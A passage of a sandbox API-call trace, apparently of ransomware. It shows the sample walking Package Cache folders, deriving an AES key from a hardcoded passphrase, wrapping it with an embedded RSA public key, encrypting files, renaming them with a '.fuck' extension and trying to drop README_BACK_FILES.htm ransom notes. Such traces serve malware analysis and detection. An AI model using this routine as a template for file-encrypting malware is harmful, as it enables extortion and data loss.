(lpFileName="C:\\\\Users\\All Users\\Package Cache\\{A2563E55-3BEC-3828-8D67-E5E8B9E8B675}v14.0.23026\\packages\\vcRuntimeMinimum_x86\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\package cache\\{a2563e55-3bec-3828-8d67-e5e8b9e8b675}v14.0.23026\\packages\\vcruntimeminimum_x86\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9e810, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0240.808] GetLastError () returned 0x5 [0240.808] GetLastError () returned 0x5 [0240.808] FindNextFileA (in: hFindFile=0x28e8578, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 0 [0240.808] FindClose (in: hFindFile=0x28e8578 | out: hFindFile=0x28e8578) returned 1 [0240.813] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{A2563E55-3BEC-3828-8D67-E5E8B9E8B675}v14.0.23026\\packages\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\package cache\\{a2563e55-3bec-3828-8d67-e5e8b9e8b675}v14.0.23026\\packages\\readme_back_files.htm")) returned 0xffffffff [0240.813] AreFileApisANSI () returned 1 [0240.813] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x28f6348, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 115 [0240.813] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{A2563E55-3BEC-3828-8D67-E5E8B9E8B675}v14.0.23026\\packages\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\package cache\\{a2563e55-3bec-3828-8d67-e5e8b9e8b675}v14.0.23026\\packages\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9ebac, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0240.813] GetLastError () returned 0x5 [0240.813] GetLastError () returned 0x5 [0240.814] FindNextFileA (in: hFindFile=0x28e8638, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 0 [0240.814] FindClose (in: hFindFile=0x28e8638 | out: hFindFile=0x28e8638) returned 1 [0240.814] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{A2563E55-3BEC-3828-8D67-E5E8B9E8B675}v14.0.23026\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\package cache\\{a2563e55-3bec-3828-8d67-e5e8b9e8b675}v14.0.23026\\readme_back_files.htm")) returned 0xffffffff [0240.814] AreFileApisANSI () returned 1 [0240.814] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e2df0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 106 [0240.814] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{A2563E55-3BEC-3828-8D67-E5E8B9E8B675}v14.0.23026\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\package cache\\{a2563e55-3bec-3828-8d67-e5e8b9e8b675}v14.0.23026\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9ef48, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0240.815] GetLastError () returned 0x5 [0240.815] GetLastError () returned 0x5 [0240.815] FindNextFileA (in: hFindFile=0x28e88b8, lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 1 [0240.815] FindFirstFileA (in: lpFileName="C:\\\\Users\\All Users\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\*.*", lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 0x28e84f8 [0240.815] FindNextFileA (in: hFindFile=0x28e84f8, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0240.815] FindNextFileA (in: hFindFile=0x28e84f8, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0240.815] FindFirstFileA (in: lpFileName="C:\\\\Users\\All Users\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\*.*", lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 0x28e8578 [0240.815] FindNextFileA (in: hFindFile=0x28e8578, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0240.815] FindNextFileA (in: hFindFile=0x28e8578, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0240.815] FindFirstFileA (in: lpFileName="C:\\\\Users\\All Users\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\*.*", lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 0x28e8638 [0240.816] FindNextFileA (in: hFindFile=0x28e8638, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 1 [0240.816] FindNextFileA (in: hFindFile=0x28e8638, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 1 [0240.816] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e59c | out: lpSystemTimeAsFileTime=0x2b9e59c) [0240.816] GetLastError () returned 0x5 [0240.816] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\cab1.cab" (normalized: "c:\\users\\all users\\package cache\\{a749d8e6-b613-3be3-8f5f-045c84eba29b}v12.0.21005\\packages\\vcruntimeminimum_amd64\\cab1.cab")) returned 0x20 [0240.816] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\cab1.cab", dwFileAttributes=0x80) returned 0 [0240.817] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\cab1.cab" (normalized: "c:\\users\\all users\\package cache\\{a749d8e6-b613-3be3-8f5f-045c84eba29b}v12.0.21005\\packages\\vcruntimeminimum_amd64\\cab1.cab"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0240.817] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\cab1.cab.gsg" (normalized: "c:\\users\\all users\\package cache\\{a749d8e6-b613-3be3-8f5f-045c84eba29b}v12.0.21005\\packages\\vcruntimeminimum_amd64\\cab1.cab.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0240.817] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\cab1.cab.gsg", dwFileAttributes=0x2) returned 0 [0240.818] CryptAcquireContextA (in: phProv=0x2b9d598, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d598*=0x28f16c8) returned 1 [0240.821] CryptCreateHash (in: hProv=0x28f16c8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d59c | out: phHash=0x2b9d59c) returned 1 [0240.821] lstrlenA (lpString="qEREZXpzESADZCNMHncAEFNjzMlQm") returned 29 [0240.821] CryptHashData (hHash=0x28e7238, pbData=0x2ec6c0, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0240.821] CryptDeriveKey (in: hProv=0x28f16c8, Algid=0x6610, hBaseData=0x28e7238, dwFlags=0x1000000, phKey=0x2b9d588 | out: phKey=0x2b9d588*=0x28e75b8) returned 1 [0240.821] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----n", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d5a4, pcbBinary=0x2b9d584, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d5a4, pcbBinary=0x2b9d584, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0240.821] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d5a4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d578, pcbStructInfo=0x2b9d580 | out: pvStructInfo=0x2b9d578, pcbStructInfo=0x2b9d580) returned 1 [0240.821] CryptAcquireContextA (in: phProv=0x2b9d594, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d594*=0x28f1b90) returned 1 [0240.821] CryptImportPublicKeyInfo (in: hCryptProv=0x28f1b90, dwCertEncodingType=0x1, pInfo=0x2905688*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x29056b8*, PublicKey.cbData=0x8c, PublicKey.pbData=0x29056c0*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d58c | out: phKey=0x2b9d58c*=0x28e72f8) returned 1 [0240.821] CryptEncrypt (in: hKey=0x28e72f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d57c*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d57c*=0x80) returned 1 [0240.822] CryptEncrypt (in: hKey=0x28e72f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x28f1398*, pdwDataLen=0x2b9d590*=0x18, dwBufLen=0x80 | out: pbData=0x28f1398*, pdwDataLen=0x2b9d590*=0x80) returned 1 [0240.822] WriteFile (in: hFile=0xffffffff, lpBuffer=0x28f1398, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0) returned 0 [0240.822] ReadFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8, lpNumberOfBytesRead=0x2b9d5a0*=0x0, lpOverlapped=0x0) returned 0 [0240.822] CryptEncrypt (in: hKey=0x28e75b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x0, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x10) returned 1 [0240.822] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0) returned 0 [0240.822] CloseHandle (hObject=0xffffffff) returned 1 [0240.822] CloseHandle (hObject=0xffffffff) returned 1 [0240.822] CopyFileA (lpExistingFileName="C:\\\\Users\\All Users\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\cab1.cab.gsg" (normalized: "c:\\users\\all users\\package cache\\{a749d8e6-b613-3be3-8f5f-045c84eba29b}v12.0.21005\\packages\\vcruntimeminimum_amd64\\cab1.cab.gsg"), lpNewFileName="C:\\\\Users\\All Users\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\cab1.cab" (normalized: "c:\\users\\all users\\package cache\\{a749d8e6-b613-3be3-8f5f-045c84eba29b}v12.0.21005\\packages\\vcruntimeminimum_amd64\\cab1.cab"), bFailIfExists=0) returned 0 [0240.822] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\cab1.cab", dwFileAttributes=0x0) returned 0 [0240.823] DeleteFileA (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\cab1.cab.gsg" (normalized: "c:\\users\\all users\\package cache\\{a749d8e6-b613-3be3-8f5f-045c84eba29b}v12.0.21005\\packages\\vcruntimeminimum_amd64\\cab1.cab.gsg")) returned 0 [0240.824] MoveFileA (lpExistingFileName="C:\\\\Users\\All Users\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\cab1.cab" (normalized: "c:\\users\\all users\\package cache\\{a749d8e6-b613-3be3-8f5f-045c84eba29b}v12.0.21005\\packages\\vcruntimeminimum_amd64\\cab1.cab"), lpNewFileName="C:\\\\Users\\All Users\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\cab1.cab.fuck" (normalized: "c:\\users\\all users\\package cache\\{a749d8e6-b613-3be3-8f5f-045c84eba29b}v12.0.21005\\packages\\vcruntimeminimum_amd64\\cab1.cab.fuck")) returned 0 [0240.824] CryptDestroyHash (hHash=0x28e7238) returned 1 [0240.824] CryptDestroyKey (hKey=0x28e75b8) returned 1 [0240.824] CryptReleaseContext (hProv=0x28f16c8, dwFlags=0x0) returned 1 [0240.824] FindNextFileA (in: hFindFile=0x28e8638, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 1 [0240.824] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e59c | out: lpSystemTimeAsFileTime=0x2b9e59c) [0240.824] GetLastError () returned 0x5 [0240.824] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\vc_runtimeMinimum_x64.msi" (normalized: "c:\\users\\all users\\package cache\\{a749d8e6-b613-3be3-8f5f-045c84eba29b}v12.0.21005\\packages\\vcruntimeminimum_amd64\\vc_runtimeminimum_x64.msi")) returned 0x20 [0240.825] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\vc_runtimeMinimum_x64.msi", dwFileAttributes=0x80) returned 0 [0240.825] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\vc_runtimeMinimum_x64.msi" (normalized: "c:\\users\\all users\\package cache\\{a749d8e6-b613-3be3-8f5f-045c84eba29b}v12.0.21005\\packages\\vcruntimeminimum_amd64\\vc_runtimeminimum_x64.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0240.826] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\vc_runtimeMinimum_x64.msi.gsg" (normalized: "c:\\users\\all users\\package cache\\{a749d8e6-b613-3be3-8f5f-045c84eba29b}v12.0.21005\\packages\\vcruntimeminimum_amd64\\vc_runtimeminimum_x64.msi.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0240.826] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\vc_runtimeMinimum_x64.msi.gsg", dwFileAttributes=0x2) returned 0 [0240.826] CryptAcquireContextA (in: phProv=0x2b9d598, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d598*=0x28f1420) returned 1 [0240.831] CryptCreateHash (in: hProv=0x28f1420, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d59c | out: phHash=0x2b9d59c) returned 1 [0240.831] lstrlenA (lpString="qEREZXpzESADZCNMHncAEFNjzMlQm") returned 29 [0240.831] CryptHashData (hHash=0x28e7978, pbData=0x2ec6c0, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0240.831] CryptDeriveKey (in: hProv=0x28f1420, Algid=0x6610, hBaseData=0x28e7978, dwFlags=0x1000000, phKey=0x2b9d588 | out: phKey=0x2b9d588*=0x28e7938) returned 1 [0240.831] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----n", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d5a4, pcbBinary=0x2b9d584, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d5a4, pcbBinary=0x2b9d584, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0240.831] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d5a4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d578, pcbStructInfo=0x2b9d580 | out: pvStructInfo=0x2b9d578, pcbStructInfo=0x2b9d580) returned 1 [0240.831] CryptAcquireContextA (in: phProv=0x2b9d594, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d594*=0x28f16c8) returned 1 [0240.832] CryptImportPublicKeyInfo (in: hCryptProv=0x28f16c8, dwCertEncodingType=0x1, pInfo=0x2906048*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2906078*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2906080*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d58c | out: phKey=0x2b9d58c*=0x28e7a78) returned 1 [0240.832] CryptEncrypt (in: hKey=0x28e7a78, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d57c*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d57c*=0x80) returned 1 [0240.832] CryptEncrypt (in: hKey=0x28e7a78, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x28f0ba0*, pdwDataLen=0x2b9d590*=0x18, dwBufLen=0x80 | out: pbData=0x28f0ba0*, pdwDataLen=0x2b9d590*=0x80) returned 1 [0240.832] WriteFile (in: hFile=0xffffffff, lpBuffer=0x28f0ba0, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0) returned 0 [0240.832] ReadFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8, lpNumberOfBytesRead=0x2b9d5a0*=0x0, lpOverlapped=0x0) returned 0 [0240.832] CryptEncrypt (in: hKey=0x28e7938, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x0, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x10) returned 1 [0240.832] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0) returned 0 [0240.832] CloseHandle (hObject=0xffffffff) returned 1 [0240.833] CloseHandle (hObject=0xffffffff) returned 1 [0240.833] CopyFileA (lpExistingFileName="C:\\\\Users\\All Users\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\vc_runtimeMinimum_x64.msi.gsg" (normalized: "c:\\users\\all users\\package cache\\{a749d8e6-b613-3be3-8f5f-045c84eba29b}v12.0.21005\\packages\\vcruntimeminimum_amd64\\vc_runtimeminimum_x64.msi.gsg"), lpNewFileName="C:\\\\Users\\All Users\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\vc_runtimeMinimum_x64.msi" (normalized: "c:\\users\\all users\\package cache\\{a749d8e6-b613-3be3-8f5f-045c84eba29b}v12.0.21005\\packages\\vcruntimeminimum_amd64\\vc_runtimeminimum_x64.msi"), bFailIfExists=0) returned 0 [0240.833] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\vc_runtimeMinimum_x64.msi", dwFileAttributes=0x0) returned 0 [0240.834] DeleteFileA (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\vc_runtimeMinimum_x64.msi.gsg" (normalized: "c:\\users\\all users\\package cache\\{a749d8e6-b613-3be3-8f5f-045c84eba29b}v12.0.21005\\packages\\vcruntimeminimum_amd64\\vc_runtimeminimum_x64.msi.gsg")) returned 0 [0240.834] MoveFileA (lpExistingFileName="C:\\\\Users\\All Users\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\vc_runtimeMinimum_x64.msi" (normalized: "c:\\users\\all users\\package cache\\{a749d8e6-b613-3be3-8f5f-045c84eba29b}v12.0.21005\\packages\\vcruntimeminimum_amd64\\vc_runtimeminimum_x64.msi"), lpNewFileName="C:\\\\Users\\All Users\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\vc_runtimeMinimum_x64.msi.fuck" (normalized: "c:\\users\\all users\\package cache\\{a749d8e6-b613-3be3-8f5f-045c84eba29b}v12.0.21005\\packages\\vcruntimeminimum_amd64\\vc_runtimeminimum_x64.msi.fuck")) returned 0 [0240.835] CryptDestroyHash (hHash=0x28e7978) returned 1 [0240.835] CryptDestroyKey (hKey=0x28e7938) returned 1 [0240.835] CryptReleaseContext (hProv=0x28f1420, dwFlags=0x0) returned 1 [0240.835] FindNextFileA (in: hFindFile=0x28e8638, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 0 [0240.835] FindClose (in: hFindFile=0x28e8638 | out: hFindFile=0x28e8638) returned 1 [0240.835] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\package cache\\{a749d8e6-b613-3be3-8f5f-045c84eba29b}v12.0.21005\\packages\\vcruntimeminimum_amd64\\readme_back_files.htm")) returned 0xffffffff [0240.836] AreFileApisANSI () returned 1 [0240.836] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x28db3d0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 138 [0240.836] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\package cache\\{a749d8e6-b613-3be3-8f5f-045c84eba29b}v12.0.21005\\packages\\vcruntimeminimum_amd64\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9e810, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0240.836] GetLastError () returned 0x5 [0240.836] GetLastError () returned 0x5 [0240.836] FindNextFileA (in: hFindFile=0x28e8578, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 0 [0240.836] FindClose (in: hFindFile=0x28e8578 | out: hFindFile=0x28e8578) returned 1 [0240.837] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\package cache\\{a749d8e6-b613-3be3-8f5f-045c84eba29b}v12.0.21005\\packages\\readme_back_files.htm")) returned 0xffffffff [0240.837] AreFileApisANSI () returned 1 [0240.837] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x28f6348, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 115 [0240.837] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\package cache\\{a749d8e6-b613-3be3-8f5f-045c84eba29b}v12.0.21005\\packages\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9ebac, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0240.837] GetLastError () returned 0x5 [0240.837] GetLastError () returned 0x5 [0240.837] FindNextFileA (in: hFindFile=0x28e84f8, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 0 [0240.837] FindClose (in: hFindFile=0x28e84f8 | out: hFindFile=0x28e84f8) returned 1 [0240.838] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\package cache\\{a749d8e6-b613-3be3-8f5f-045c84eba29b}v12.0.21005\\readme_back_files.htm")) returned 0xffffffff [0240.838] AreFileApisANSI () returned 1 [0240.838] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e2d78, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 106 [0240.838] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\package cache\\{a749d8e6-b613-3be3-8f5f-045c84eba29b}v12.0.21005\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9ef48, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0240.838] GetLastError () returned 0x5 [0240.838] GetLastError () returned 0x5 [0240.838] FindNextFileA (in: hFindFile=0x28e88b8, lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 1 [0240.839] FindFirstFileA (in: lpFileName="C:\\\\Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\*.*", lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 0x28e84f8 [0240.839] FindNextFileA (in: hFindFile=0x28e84f8, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0240.839] FindNextFileA (in: hFindFile=0x28e84f8, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0240.839] FindFirstFileA (in: lpFileName="C:\\\\Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\*.*", lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 0x28e8578 [0240.839] FindNextFileA (in: hFindFile=0x28e8578, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0240.839] FindNextFileA (in: hFindFile=0x28e8578, 